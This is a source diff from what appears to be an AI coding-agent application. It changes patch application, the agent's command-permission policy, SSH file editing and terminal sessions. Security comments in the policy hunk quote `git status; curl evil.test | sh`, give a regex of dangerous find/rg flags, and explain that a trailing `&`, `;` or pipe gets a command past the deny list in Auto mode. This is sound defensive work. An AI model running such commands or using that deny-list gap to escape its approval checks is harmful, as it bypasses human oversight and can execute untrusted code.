|
||||
|
||||
if raw.startswith(_NO_NEWLINE):
|
||||
# It describes whichever side the line above belonged to. Only the
|
||||
# new side is an instruction; the old side is a description of the
|
||||
# file we are about to read for ourselves.
|
||||
if state["body"] and state["body"][-1][:1] in ("+", " "):
|
||||
state["bare"] = True
|
||||
continue
|
||||
if raw[:1] in ("+", "-", " "):
|
||||
state["body"].append(raw)
|
||||
elif raw == "":
|
||||
# A blank line that lost its leading space. Common enough to be the
|
||||
# normal case rather than an exceptional one.
|
||||
state["body"].append(" ")
|
||||
else:
|
||||
# A stray line inside a hunk -- a second `diff --git`, a signature.
|
||||
# Ends the hunk rather than corrupting it.
|
||||
flush()
|
||||
|
||||
flush()
|
||||
|
||||
if not hunks:
|
||||
raise PatchError(
|
||||
"That patch has no hunks. A patch needs at least one "
|
||||
"`@@ -old,count +new,count @@` header, followed by the lines to "
|
||||
"change: ' ' for context, '-' to remove, '+' to add."
|
||||
)
|
||||
if len(hunks) > MAX_HUNKS:
|
||||
raise PatchError(
|
||||
f"That patch has {len(hunks)} hunks, and {MAX_HUNKS} is the most "
|
||||
f"that will be applied at once. Rewrite the file with file_write "
|
||||
f"instead, or send the change in pieces."
|
||||
)
|
||||
return hunks
|
||||
|
||||
|
||||
def _find(lines: list[str], wanted: tuple[str, ...], hint: int, floor: int) -> int:
|
||||
"""Where `wanted` sits in `lines`, at or after `floor`. Raises if unclear."""
|
||||
if not wanted:
|
||||
# A pure insertion has no context to match. The hint is all there is.
|
||||
return max(floor, min(hint, len(lines)))
|
||||
|
||||
span = len(wanted)
|
||||
if hint >= floor and lines[hint : hint + span] == list(wanted):
|
||||
return hint
|
||||
|
||||
matches = [
|
||||
at
|
||||
for at in range(max(floor, hint - MAX_DRIFT), min(len(lines) - span, hint + MAX_DRIFT) + 1)
|
||||
if lines[at : at + span] == list(wanted)
|
||||
]
|
||||
if len(matches) == 1:
|
||||
return matches[0]
|
||||
if len(matches) > 1:
|
||||
raise PatchError(
|
||||
f"Those context lines appear {len(matches)} times in the file, and "
|
||||
f"the line numbers in the hunk header do not point at any of them, "
|
||||
f"so there is no way to tell which was meant. Include more "
|
||||
f"unchanged lines around the change."
|
||||
)
|
||||
raise PatchError("") # Filled in by the caller, which knows the hunk number.
|
||||
|
||||
|
||||
def apply(text: str, hunks: list[Hunk]) -> str:
|
||||
"""The file with every hunk applied, or a PatchError naming the first that
|
||||
would not.
|
||||
|
||||
Hunks are applied in order against a cursor, so one cannot match inside
|
||||
territory an earlier one already consumed -- which is what a duplicated or
|
||||
overlapping hunk would otherwise do, applying the same change twice.
|
||||
"""
|
||||
crlf = "\r\n" in text
|
||||
lines = text.replace("\r\n", "\n").replace("\r", "\n").split("\n")
|
||||
trailing = lines and lines[-1] == ""
|
||||
if trailing:
|
||||
lines.pop()
|
||||
|
||||
out: list[str] = []
|
||||
cursor = 0
|
||||
reached_end = False
|
||||
|
||||
for number, hunk in enumerate(hunks, start=1):
|
||||
wanted = hunk.before
|
||||
# A pure insertion names the line it goes *after*, not the line it
|
||||
# replaces, so it is not off by one the way every other hunk is.
|
||||
hint = hunk.old_start if hunk.old_count == 0 else max(hunk.old_start - 1, 0)
|
||||
try:
|
||||
at = _find(lines, wanted, hint, cursor)
|
||||
except PatchError as exc:
|
||||
raise _mismatch(number, hunk, lines, hint, exc.message) from None
|
||||
|
||||
out.extend(lines[cursor:at])
|
||||
out.extend(hunk.after)
|
||||
cursor = at + len(wanted)
|
||||
reached_end = hunk.ends_without_newline and cursor >= len(lines)
|
||||
|
||||
out.extend(lines[cursor:])
|
||||
|
||||
result = "\n".join(out)
|
||||
if trailing and not reached_end:
|
||||
result += "\n"
|
||||
return result.replace("\n", "\r\n") if crlf else result
|
||||
|
||||
|
||||
def _mismatch(number: int, hunk: Hunk, lines: list[str], hint: int, why: str) -> PatchError:
|
||||
"""The message the model retries from, so it has to say what is actually
|
||||
there rather than only that something is wrong."""
|
||||
if why:
|
||||
return PatchError(
|
||||
f"Hunk {number} did not apply. {why} Nothing was written.", hunk=number
|
||||
)
|
||||
|
||||
expected = next((line[1:] for line in hunk.lines if line[:1] in (" ", "-")), "")
|
||||
return PatchError(
|
||||
f"Hunk {number} did not apply. It expects line {hint + 1} to be\n"
|
||||
f" {expected}\n"
|
||||
f"but the file has\n"
|
||||
f"{_around(lines, hint)}\n"
|
||||
f"and those lines are nowhere else nearby either. Nothing was written. "
|
||||
f"Send a patch whose context matches what is printed above.",
|
||||
hunk=number,
|
||||
)
|
||||
|
||||
|
||||
# How many lines either side of the hinted position to print back. Three, which
|
||||
# is what a patch carries as context, so a model can read its next attempt
|
||||
# straight off the message.
|
||||
MISMATCH_WINDOW = 3
|
||||
|
||||
|
||||
def _around(lines: list[str], hint: int) -> str:
|
||||
"""The file as it actually is, around where the hunk expected to land.
|
||||
|
||||
One line was not enough. A model whose line numbers are two out reads "the
|
||||
file has X", cannot see where X sits relative to what it wanted, and sends
|
||||
the identical patch again -- which is most of the retry loop this tool
|
||||
produces in practice. Numbered, because the numbers are what was wrong.
|
||||
"""
|
||||
if not lines:
|
||||
return " (the file is empty)"
|
||||
if hint >= len(lines):
|
||||
start = max(0, len(lines) - MISMATCH_WINDOW)
|
||||
shown = [f" {n + 1:>5} {lines[n]}" for n in range(start, len(lines))]
|
||||
return "\n".join([*shown, f" (the file ends at line {len(lines)})"])
|
||||
|
||||
start = max(0, hint - MISMATCH_WINDOW)
|
||||
end = min(len(lines), hint + MISMATCH_WINDOW + 1)
|
||||
return "\n".join(
|
||||
f"{'->' if n == hint else ' '} {n + 1:>5} {lines[n]}" for n in range(start, end)
|
||||
)
|
||||
|
||||
|
||||
def render(before: str, after: str, path: str, *, max_lines: int = 200) -> str:
|
||||
"""A unified diff of one change, for the transcript.
|
||||
|
||||
Bounded here rather than at render time: this ends up in
|
||||
`Message.tool_calls_json`, which is on the row forever and re-parsed on
|
||||
every page load, and a generated file's diff can be larger than the file.
|
||||
"""
|
||||
# splitlines, not split("\n"): a file's own final newline would otherwise be
|
||||
# an empty last element, which difflib renders as a stray context line at
|
||||
# the bottom of every diff -- and as a spurious change whenever one side has
|
||||
# it and the other does not. The trailing-newline difference is invisible
|
||||
# here as a result, which is right for a display and irrelevant to the write.
|
||||
lines = list(
|
||||
difflib.unified_diff(
|
||||
before.replace("\r\n", "\n").splitlines(),
|
||||
after.replace("\r\n", "\n").splitlines(),
|
||||
fromfile=f"a/{path}",
|
||||
tofile=f"b/{path}",
|
||||
lineterm="",
|
||||
n=3,
|
||||
)
|
||||
)
|
||||
if len(lines) > max_lines:
|
||||
dropped = len(lines) - max_lines
|
||||
lines = lines[:max_lines] + [f"… ({dropped} more lines)"]
|
||||
return "\n".join(lines)
|
||||
|
||||
|
||||
__all__ = ["MAX_DRIFT", "MAX_HUNKS", "Hunk", "PatchError", "apply", "parse", "render"]
|
||||
@@ -64,14 +64,9 @@ MODE_GUIDANCE = {
|
||||
),
|
||||
MODE_PLAN: (
|
||||
"You are in **Plan** mode: read and explore freely, but change nothing. "
|
||||
"Research before you propose anything — read the files, run the "
|
||||
"read-only commands, look at what is actually there rather than at what "
|
||||
"is usually there. If the scope is genuinely ambiguous, and only then, "
|
||||
"ask with ask_user before planning rather than planning for the wrong "
|
||||
"thing; put everything you need into one question. Then finish with "
|
||||
"plan_submit: what you found, what the work is for, and the work itself "
|
||||
"as phases of concrete tasks. Anything that writes or runs will be "
|
||||
"stopped for approval, so do not rely on it."
|
||||
"Anything that writes or runs will be stopped for approval, so do not "
|
||||
"rely on it. Finish by setting out what you would do, as steps, so it "
|
||||
"can be carried out afterwards."
|
||||
),
|
||||
}
|
||||
|
||||
@@ -86,62 +81,13 @@ POLICY: dict[str, dict[str, str]] = {
|
||||
MODE_PLAN: {RISK_READ: ALLOW, RISK_WRITE: ASK, RISK_EXECUTE: ASK},
|
||||
}
|
||||
|
||||
# A shell metacharacter makes a command line unmatchable, so no pattern may be
|
||||
# applied to it. Without this, `git *` in an allow list also matches
|
||||
# `git status; curl evil.test | sh`, which is the whole ballgame. That half is
|
||||
# absolute and is what this constant exists for.
|
||||
#
|
||||
# The deny list is the other half, and it has been decided both ways. There was
|
||||
# once a rule that an unmatchable line ASKed whenever a deny list existed at
|
||||
# all, on the grounds that `shutdown -h now` asked while `shutdown -h now &`
|
||||
# ran. It is gone: the shipped deny list is non-empty, so that rule made *every*
|
||||
# compound command ask in Auto -- `cd build && make`, `pytest | tail`, anything
|
||||
# with a pipe -- and a mode whose whole purpose is not asking asked about most
|
||||
# real commands. It was not a security control anybody experienced as one; it
|
||||
# was Auto appearing not to work.
|
||||
#
|
||||
# So an unmatchable line now falls through to the mode, and in Auto the mode is
|
||||
# ALLOW. What that gives up, plainly: a deny pattern can be walked past with a
|
||||
# trailing `&`, a `;` or a pipe. Auto is the only mode where this is reachable,
|
||||
# because Manual, Edit and Plan all ASK on RISK_EXECUTE regardless. The allow
|
||||
# list is untouched by the change and still cannot be matched at all.
|
||||
#
|
||||
# The upgrade that would restore both properties is to split a composed line on
|
||||
# these metacharacters and check every segment against the deny list only. It is
|
||||
# confined to `decide` and is worth doing; it is not done here.
|
||||
# A shell metacharacter makes a command line unmatchable, so it falls through to
|
||||
# the mode's own verdict rather than to an allow-list entry. Without this,
|
||||
# `git *` in an allow list also matches `git status; curl evil.test | sh`, which
|
||||
# is the whole ballgame. A deny list needs no such rule: failing open there
|
||||
# returns you to the mode, while failing open on an allow list runs the command.
|
||||
_UNSAFE = re.compile(r"[;&|<>`$\n\\()]")
|
||||
|
||||
# Flags that turn a "read-only" command into one that writes or executes, on
|
||||
# tools whose *name* is on somebody's allow list.
|
||||
#
|
||||
# `_UNSAFE` stops a command line being composed out of two commands. It does
|
||||
# nothing about a single command that composes one itself, and several of the
|
||||
# obvious read-only tools do: `find -exec cmd +` runs a program, `-fprintf`
|
||||
# writes a file, `-delete` removes one, and `rg --pre` runs a preprocessor for
|
||||
# every file it opens. None of those needs a character `_UNSAFE` refuses, so
|
||||
# `find *` on an allow list -- which is what a subagent gets, in every mode --
|
||||
# was arbitrary write and arbitrary execution wearing a read-only name.
|
||||
#
|
||||
# Refused here rather than trimmed from the allow list alone, because the list
|
||||
# is the thing an administrator edits and "this one looks read-only" is exactly
|
||||
# the reasoning that put `find *` there. A pattern cannot express "and no
|
||||
# dangerous flags"; this can.
|
||||
#
|
||||
# Matched on the *normalised* line and word-bounded, so `docs/-exec-notes.md`
|
||||
# is fine -- the flag has to stand alone as an argument.
|
||||
#
|
||||
# It does catch `grep -rn -- -delete src/`, where the word is a search term
|
||||
# rather than a flag, and that is the right direction to be wrong in: a false
|
||||
# refusal here means the call falls through to the policy table and asks, which
|
||||
# costs one approval card. A false allow means an unattended helper writing
|
||||
# files. Nothing is *blocked* by this -- a reader in Auto still gets it, and in
|
||||
# any other mode they are shown it first, which is what they would want to be
|
||||
# shown.
|
||||
_ACTION = re.compile(
|
||||
r"(?:^|\s)-(?:exec|execdir|ok|okdir|fprintf|fprint|fprint0|delete)(?=\s|$)"
|
||||
r"|(?:^|\s)--(?:pre|search-zip|hostname-bin)(?=[\s=]|$)"
|
||||
)
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Decision:
|
||||
@@ -153,26 +99,14 @@ class Decision:
|
||||
class Limits:
|
||||
"""What one agent reply may spend.
|
||||
|
||||
Four axes because they fail differently. Wall clock stops a single slow
|
||||
command eating an afternoon; `output_bytes` stops a model filling its own
|
||||
context with build logs and having no room left to answer; and
|
||||
`completion_tokens` stops one that keeps writing.
|
||||
|
||||
`steps` is the odd one out. It is a **runaway backstop, not a working
|
||||
budget** -- an agent reply is meant to run until the task is finished, and a
|
||||
step count low enough to be the thing that ends it is a count that ends it
|
||||
halfway. It was 40, which is a working budget, and it was reached. Anything
|
||||
that wants a real ceiling should set `completion_tokens`, which measures
|
||||
what a long reply actually costs.
|
||||
|
||||
`completion_tokens` of 0 means no ceiling, the same convention `index_chars`
|
||||
uses in the settings store.
|
||||
Three axes because they fail differently. Steps stop a loop; wall clock
|
||||
stops a single slow command eating an afternoon; output stops a model
|
||||
filling its own context with build logs and having no room left to answer.
|
||||
"""
|
||||
|
||||
steps: int = 200
|
||||
steps: int = 40
|
||||
wall_seconds: float = 900.0
|
||||
output_bytes: int = 1024 * 1024
|
||||
completion_tokens: int = 200_000
|
||||
|
||||
|
||||
def subject(tool_name: str, command: str = "") -> str | None:
|
||||
@@ -193,8 +127,6 @@ def subject(tool_name: str, command: str = "") -> str | None:
|
||||
if _UNSAFE.search(raw):
|
||||
return None
|
||||
line = " ".join(raw.split())
|
||||
if _ACTION.search(line):
|
||||
return None
|
||||
return line or None
|
||||
|
||||
|
||||
@@ -228,10 +160,6 @@ def decide(
|
||||
3. An allow-list hit runs it.
|
||||
4. Otherwise the table.
|
||||
|
||||
A command line carrying a shell metacharacter matches neither list, so it
|
||||
reaches the table and Auto runs it. See the note above `_UNSAFE` for what
|
||||
that trades away and why.
|
||||
|
||||
An unrecognised mode is treated as Manual, not Auto: a row that predates a
|
||||
rename has to fail towards asking.
|
||||
"""
|
||||
|
||||
@@ -21,7 +21,7 @@ from sqlalchemy.orm import Session as DBSession
|
||||
|
||||
from lembas.db.models import KIND_AGENT, Chat, SshProfile, User
|
||||
from lembas.services import settings_store
|
||||
from lembas.services.agent import hosts, policy
|
||||
from lembas.services.agent import policy
|
||||
from lembas.services.agent import ssh as ssh_service
|
||||
from lembas.services.agent.base import Executor
|
||||
from lembas.services.agent.policy import Limits
|
||||
@@ -58,47 +58,6 @@ class AgentContext:
|
||||
# this they would refuse the very thing that was approved -- the mode says
|
||||
# "ask", and asking is exactly what happened.
|
||||
approved: bool = False
|
||||
# Absolute paths this reply has read. `file_edit` refuses a file that is not
|
||||
# in here, because a patch written from memory against a file the model has
|
||||
# not looked at is how a rewrite silently loses somebody's work.
|
||||
#
|
||||
# Here rather than on `Generation` for two reasons. Runners never see a
|
||||
# Generation -- they get a `ToolContext`, which is a session-free snapshot
|
||||
# precisely so nothing in a tool holds live state -- and a read path is a
|
||||
# fact about the machine, which is what this class is.
|
||||
#
|
||||
# It is **shared with the approved copy**: `as_approved` is
|
||||
# `dataclasses.replace`, which copies field references, so a path read
|
||||
# through an approved call is visible here. That is wanted and is not
|
||||
# obvious, so there is a test for it.
|
||||
#
|
||||
# It resets each reply, and that is correct rather than a limitation.
|
||||
# `Message.tool_calls_json` is deliberately never replayed as context, so on
|
||||
# the next turn the model does not have the file's contents either --
|
||||
# requiring a re-read in the reply that edits is asking for something it
|
||||
# needs anyway.
|
||||
read_paths: set[str] = field(default_factory=set)
|
||||
# The plan currently in force, seeded from `chat.plan_message_id` when this
|
||||
# is resolved. Mutable and read/written in place by `plan_update`, for a
|
||||
# reason that is not obvious: a runner cannot write the message row --
|
||||
# `_persist` is the single writer -- so it returns the merged plan on its
|
||||
# event and the loop carries it. Two updates in one reply would then both
|
||||
# read the same stale plan from the database and the second would lose the
|
||||
# first. This snapshot is what they actually merge into.
|
||||
plan: dict[str, Any] = field(default_factory=dict)
|
||||
# Whether commands may run detached. When off, `shell_run` is byte-for-byte
|
||||
# what it always was and the `job_*` tools are not offered -- a command that
|
||||
# times out is killed, as before. When on, a command can be launched in the
|
||||
# background (or converted to one when it times out) and the model gets the
|
||||
# tools to check on it. `on_timeout` is the sub-switch for the auto-convert.
|
||||
background: bool = False
|
||||
background_on_timeout: bool = True
|
||||
# Whether a finished job wakes the model on its own, rather than only being
|
||||
# seen when it next runs. Read by the wording here and by the watcher.
|
||||
background_notify: bool = True
|
||||
# Most jobs watched at once. A watcher is a periodic reconnect, so this is a
|
||||
# real resource; past it a job still runs but is not watched or woken for.
|
||||
background_max_jobs: int = 5
|
||||
|
||||
def executor(self) -> Executor:
|
||||
return ssh_service.SshExecutor(self.spec, self.project_dir)
|
||||
@@ -111,25 +70,6 @@ class AgentContext:
|
||||
return replace(self, approved=True)
|
||||
|
||||
|
||||
def _plan_of(db: DBSession, chat: Chat) -> dict[str, Any]:
|
||||
"""The plan this chat is working to, or an empty dict.
|
||||
|
||||
One `db.get` by primary key -- the column exists to avoid a scan for "the
|
||||
newest message carrying a plan", because this runs while a request is
|
||||
waiting. The id is validated here rather than constrained in the schema, for
|
||||
the reason the column's comment gives.
|
||||
"""
|
||||
from lembas.db.models import Message
|
||||
from lembas.services import plans
|
||||
|
||||
if not chat.plan_message_id:
|
||||
return {}
|
||||
message = db.get(Message, chat.plan_message_id)
|
||||
if message is None or message.chat_id != chat.id:
|
||||
return {}
|
||||
return plans.normalise(message.plan_json)
|
||||
|
||||
|
||||
def profile_for(db: DBSession, chat: Chat, user: User | None) -> SshProfile | None:
|
||||
"""The connection this chat is pointed at, if it is still usable.
|
||||
|
||||
@@ -146,86 +86,9 @@ def profile_for(db: DBSession, chat: Chat, user: User | None) -> SshProfile | No
|
||||
return None
|
||||
if user is not None and profile.owner_id != user.id:
|
||||
return None
|
||||
# A row can predate a setting, so this is asked here rather than trusted
|
||||
# from when the profile was saved: an administrator moving the switch to
|
||||
# `off` has to stop the chats already pointed at loopback, not only the next
|
||||
# one somebody tries to create. See services/agent/hosts.py.
|
||||
if not hosts.usable(db, profile):
|
||||
return None
|
||||
return profile
|
||||
|
||||
|
||||
def _allow_for(chat: Chat) -> tuple[str, ...]:
|
||||
"""Imported inside `resolve` rather than at module scope.
|
||||
|
||||
`services/tools.py` imports this module's `resolve`, so a top-level import
|
||||
back the other way is a cycle.
|
||||
"""
|
||||
from lembas.services import tools as tools_service
|
||||
|
||||
return tools_service.scoped_allow(chat)
|
||||
|
||||
|
||||
def refresh(db: DBSession, agent: AgentContext) -> AgentContext:
|
||||
"""Re-read the two things a person can change while a reply is running.
|
||||
|
||||
The mode and the chat's own allow list, and nothing else. Everything else on
|
||||
the context is fixed for the life of a chat (the connection, the directory)
|
||||
or is an instance setting nobody is editing mid-reply.
|
||||
|
||||
Called once per round rather than once per reply. The reply-long snapshot it
|
||||
replaces made both controls do nothing until the next turn: switching to
|
||||
Auto during a long agent reply went on asking about every call, and
|
||||
"Always allow this" was accepted, written to the row, and then ignored for
|
||||
the rest of the reply that had just asked. Both look exactly like a control
|
||||
that does not work, because for that reply they were.
|
||||
|
||||
Once per *round* and not more often, because a round's calls are authorised
|
||||
together: what is already queued was decided under the mode that was in
|
||||
force when it was queued, and switching to Auto must not retroactively
|
||||
approve it. Mutated in place -- `as_approved` copies field references, so a
|
||||
replacement here would leave the approved copy of this round pointing at the
|
||||
old one.
|
||||
"""
|
||||
chat = db.get(Chat, agent.chat_id)
|
||||
if chat is None:
|
||||
return agent
|
||||
|
||||
agent.mode = chat.agent_mode if chat.agent_mode in policy.MODES else policy.MODE_MANUAL
|
||||
instance = settings_store.agents(db)
|
||||
agent.allow = (*(instance.get("allow_default") or ()), *_allow_for(chat))
|
||||
return agent
|
||||
|
||||
|
||||
def _limits_for(db: DBSession, chat: Chat, values: dict[str, Any]) -> Limits:
|
||||
"""What this chat's replies may spend.
|
||||
|
||||
A helper's chat is sized by its own settings rather than the instance's,
|
||||
because a reply answering one delegated question is not the same shape of
|
||||
work as the reply that asked it: it should run out of room long before its
|
||||
parent does, and an agent chat's own numbers are deliberately generous
|
||||
enough to run for a quarter of an hour. `output_bytes` is shared, being a
|
||||
property of what a command can hand back rather than of who asked.
|
||||
|
||||
`or 0` is avoided on the completion ceiling in both branches: zero is how an
|
||||
administrator says "no ceiling", and the accessors have already clamped it.
|
||||
"""
|
||||
if chat.parent_chat_id:
|
||||
sub = settings_store.subagents(db)
|
||||
return Limits(
|
||||
steps=int(sub["max_rounds"]),
|
||||
wall_seconds=float(sub["wall_seconds"]),
|
||||
output_bytes=int(values.get("max_total_output_bytes") or 1024 * 1024),
|
||||
completion_tokens=int(sub.get("max_completion_tokens", 60_000) or 0),
|
||||
)
|
||||
return Limits(
|
||||
steps=int(values.get("max_steps") or 200),
|
||||
wall_seconds=float(values.get("max_wall_seconds") or 900),
|
||||
output_bytes=int(values.get("max_total_output_bytes") or 1024 * 1024),
|
||||
completion_tokens=int(values.get("max_completion_tokens", 200_000) or 0),
|
||||
)
|
||||
|
||||
|
||||
def resolve(db: DBSession, chat: Chat, user: User | None) -> AgentContext | None:
|
||||
"""This chat's agent setup, or None if it has none it can use.
|
||||
|
||||
@@ -252,24 +115,19 @@ def resolve(db: DBSession, chat: Chat, user: User | None) -> AgentContext | None
|
||||
return AgentContext(
|
||||
chat_id=chat.id,
|
||||
label=profile.label,
|
||||
plan=_plan_of(db, chat),
|
||||
project_dir=chat.project_dir or profile.default_dir or "",
|
||||
profile_id=profile.id,
|
||||
mode=chat.agent_mode if chat.agent_mode in policy.MODES else policy.MODE_MANUAL,
|
||||
# The instance's list, plus whatever this chat's reader has said
|
||||
# "always" to on a card. Never the other way round for the deny list:
|
||||
# a chat cannot un-deny anything, and `decide` consults deny first
|
||||
# regardless.
|
||||
allow=(*(values.get("allow_default") or ()), *_allow_for(chat)),
|
||||
allow=tuple(values.get("allow_default") or ()),
|
||||
deny=tuple(values.get("deny_default") or ()),
|
||||
limits=_limits_for(db, chat, values),
|
||||
limits=Limits(
|
||||
steps=int(values.get("max_steps") or 40),
|
||||
wall_seconds=float(values.get("max_wall_seconds") or 900),
|
||||
output_bytes=int(values.get("max_total_output_bytes") or 1024 * 1024),
|
||||
),
|
||||
timeout=float(values.get("default_timeout") or 60),
|
||||
max_timeout=float(values.get("max_timeout") or 600),
|
||||
max_output=int(values.get("max_output_bytes") or 64 * 1024),
|
||||
background=bool(values.get("background_enabled")),
|
||||
background_on_timeout=bool(values.get("background_on_timeout", True)),
|
||||
background_notify=bool(values.get("background_notify", True)),
|
||||
background_max_jobs=int(values.get("background_max_jobs") or 5),
|
||||
spec=ssh_service.spec_from(profile),
|
||||
)
|
||||
|
||||
|
||||
@@ -26,21 +26,17 @@ forgot to install it gets a sentence rather than an ImportError at startup.
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import contextlib
|
||||
import logging
|
||||
import time
|
||||
from typing import Any
|
||||
|
||||
from lembas.db.models import AUTH_PASSWORD, SshProfile
|
||||
from lembas.services.agent.base import (
|
||||
Conflict,
|
||||
ExecError,
|
||||
ExecRequest,
|
||||
ExecResult,
|
||||
RemoteEntry,
|
||||
RemoteFile,
|
||||
clean_output,
|
||||
revision_of,
|
||||
)
|
||||
from lembas.services.crypto import decrypt
|
||||
|
||||
@@ -288,111 +284,6 @@ class SshExecutor:
|
||||
raise self._wrap(exc) from exc
|
||||
return len(payload)
|
||||
|
||||
# --- The same files, for somebody about to edit them ---------------------
|
||||
# Deliberately not `read_file`/`write_file`, and those two are deliberately
|
||||
# left exactly as they are: what they return is a contract a model has been
|
||||
# shown, and it is the right contract for a model.
|
||||
#
|
||||
# It is the wrong one for an editor. `read_file` ends in `clean_output`,
|
||||
# which strips ANSI escape sequences and decodes with errors="replace" --
|
||||
# correct for the output of a command, and for a file it means that opening
|
||||
# one containing an escape byte and pressing Save rewrites it with the
|
||||
# escapes gone and every undecodable byte replaced by U+FFFD. `write_file`
|
||||
# truncates at MAX_WRITE_BYTES, which a model is told about and a person
|
||||
# pressing Save is not.
|
||||
async def read_text(self, path: str, *, max_bytes: int = MAX_READ_BYTES) -> RemoteFile:
|
||||
"""A file as somebody is about to edit it.
|
||||
|
||||
Strict decoding, so a file this cannot represent faithfully is reported
|
||||
as binary rather than silently mangled into something that would be
|
||||
saved back. The stat and the read share one connection: connections are
|
||||
per call, so doing it in two is two handshakes and two authentications
|
||||
to open one file.
|
||||
"""
|
||||
import asyncssh
|
||||
|
||||
try:
|
||||
async with (
|
||||
self._connect() as conn,
|
||||
conn.start_sftp_client() as sftp,
|
||||
sftp.open(self._resolve(path), "rb") as handle,
|
||||
):
|
||||
attrs = await handle.stat()
|
||||
data = await handle.read(max_bytes + 1)
|
||||
except asyncssh.SFTPNoSuchFile as exc:
|
||||
raise ExecError(f"There is no file at {path}.") from exc
|
||||
except asyncssh.SFTPPermissionDenied as exc:
|
||||
raise ExecError(f"Not allowed to read {path}.") from exc
|
||||
except (OSError, asyncssh.Error) as exc:
|
||||
raise self._wrap(exc) from exc
|
||||
|
||||
truncated = len(data) > max_bytes
|
||||
data = data[:max_bytes]
|
||||
size = int(getattr(attrs, "size", None) or len(data))
|
||||
mtime = int(getattr(attrs, "mtime", None) or 0)
|
||||
|
||||
# A NUL in the first few kilobytes, or anything that will not decode.
|
||||
# Either way there is nothing safe to put in a textarea.
|
||||
if b"\0" in data[:8192]:
|
||||
return RemoteFile("", size, mtime, truncated, binary=True)
|
||||
try:
|
||||
text = data.decode("utf-8")
|
||||
except UnicodeDecodeError:
|
||||
return RemoteFile("", size, mtime, truncated, binary=True)
|
||||
return RemoteFile(text, size, mtime, truncated, binary=False)
|
||||
|
||||
async def write_text(self, path: str, text: str, *, if_unchanged: str = "") -> RemoteFile:
|
||||
"""Write a file, refusing if it moved under the editor.
|
||||
|
||||
`if_unchanged` is the token `read_text` handed out. The re-stat and the
|
||||
write happen on one connection, which is the narrowest window SFTP
|
||||
allows; there is no compare-and-swap here and this does not pretend to
|
||||
be atomic. It catches what it exists for -- another editor, a build, a
|
||||
checkout between opening a tab and pressing Save -- and not a race
|
||||
measured in milliseconds.
|
||||
|
||||
Oversize is refused rather than truncated. `write_file` truncates
|
||||
because a model is told how many bytes it wrote; somebody pressing Save
|
||||
would lose the tail of their file with nothing said.
|
||||
"""
|
||||
import asyncssh
|
||||
|
||||
payload = text.encode("utf-8")
|
||||
if len(payload) > MAX_WRITE_BYTES:
|
||||
raise ExecError(
|
||||
f"That is {len(payload) // 1024}KB and the limit is "
|
||||
f"{MAX_WRITE_BYTES // 1024}KB. Nothing was written."
|
||||
)
|
||||
|
||||
target = self._resolve(path)
|
||||
try:
|
||||
async with self._connect() as conn, conn.start_sftp_client() as sftp:
|
||||
if if_unchanged:
|
||||
current = ""
|
||||
with contextlib.suppress(asyncssh.SFTPNoSuchFile):
|
||||
attrs = await sftp.stat(target)
|
||||
current = revision_of(
|
||||
int(getattr(attrs, "mtime", None) or 0),
|
||||
int(getattr(attrs, "size", None) or 0),
|
||||
)
|
||||
if current and current != if_unchanged:
|
||||
raise Conflict(current)
|
||||
async with sftp.open(target, "wb") as handle:
|
||||
await handle.write(payload)
|
||||
attrs = await sftp.stat(target)
|
||||
except asyncssh.SFTPPermissionDenied as exc:
|
||||
raise ExecError(f"Not allowed to write {path}.") from exc
|
||||
except (OSError, asyncssh.Error) as exc:
|
||||
raise self._wrap(exc) from exc
|
||||
|
||||
return RemoteFile(
|
||||
text,
|
||||
len(payload),
|
||||
int(getattr(attrs, "mtime", None) or 0),
|
||||
truncated=False,
|
||||
binary=False,
|
||||
)
|
||||
|
||||
async def list_dir(self, path: str = "") -> list[str]:
|
||||
import asyncssh
|
||||
|
||||
|
||||
@@ -620,30 +620,6 @@ async def close_chat(chat_id: str, reason: str = CLOSED_REVOKED) -> bool:
|
||||
return True
|
||||
|
||||
|
||||
def rekey(old: str, new: str) -> Session | None:
|
||||
"""Move a live session from one id to another, keeping the shell.
|
||||
|
||||
What adoption is made of: a shell opened on the new-chat screen under a
|
||||
draft id becomes the shell of the chat that screen turned into, with its
|
||||
scrollback and whatever is half-typed at its prompt. Nothing reconnects --
|
||||
the browser navigates after `start_chat` and attaches to the session now
|
||||
living under the real id, which is the "a reload is indistinguishable from a
|
||||
second tab" property working for us rather than against us.
|
||||
|
||||
**Both the key and the field.** `close_for_profile`, `close_for_owner` and
|
||||
the reaper all pop by `session.chat_id` rather than by the key they found it
|
||||
under, so a stale field would leave a closed session in the registry that
|
||||
`get` keeps handing out and `count_for` keeps counting.
|
||||
"""
|
||||
session = _SESSIONS.pop(old, None)
|
||||
if session is None:
|
||||
return None
|
||||
session.chat_id = new
|
||||
_SESSIONS[new] = session
|
||||
log.info("terminal adopted %s -> %s", old, new)
|
||||
return session
|
||||
|
||||
|
||||
async def close_for_profile(profile_id: str) -> int:
|
||||
"""End every shell opened on one connection.
|
||||
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
@@ -1,519 +0,0 @@
|
||||
"""What this installation is called, and what it looks like.
|
||||
|
||||
An instance can be somebody else's. That means four separate things, and they
|
||||
are separate because they fail differently:
|
||||
|
||||
- an **identity** — a name, a tagline, a logo, a favicon, the icons a launcher
|
||||
shows;
|
||||
- **flavour text** — the Middle-earth lines, which live in the artwork, the
|
||||
empty states, the loading lines and the error pages and nowhere else (see the
|
||||
flavour rule in the working notes), and which somebody rebranding needs to be able to
|
||||
replace without editing templates;
|
||||
- **themes**, which are token sets rather than stylesheets, because the
|
||||
invariant that no component hard-codes a colour is what makes a third one
|
||||
compose at all;
|
||||
- **arbitrary CSS**, for the things the first three do not reach.
|
||||
|
||||
## Defaults in code, overrides in the database
|
||||
|
||||
The prompt-fragment rule, applied again and for the same reason: text equal to
|
||||
its default is never stored, so a later release improving a default still
|
||||
reaches an instance whose administrator once pressed Save. `stored_only` is what
|
||||
enforces it, and every save goes through it.
|
||||
|
||||
## Why a snapshot, and why a Jinja global
|
||||
|
||||
`web/templating.py:render()` has no database session, and the login page, the
|
||||
error pages, the offline page and the SSE path do not go through it at all. A
|
||||
context value would therefore have to be threaded through every one of those,
|
||||
and the ones that bypass `render()` could not be reached at all.
|
||||
|
||||
So this is a **process-level cache** behind a lazy proxy registered as a Jinja
|
||||
global. One query per process, and after every save; every render path gets it
|
||||
including the ones that never see a `Request`. `forget()` is called by the admin
|
||||
page and by nothing else.
|
||||
|
||||
The cost of being a cache is stated rather than discovered: with several
|
||||
workers, a save in one is not seen by the others until each next reads. That is
|
||||
already true of this application for other reasons -- see the "one worker" note
|
||||
in the roadmap -- and this does not make it worse.
|
||||
"""
|
||||
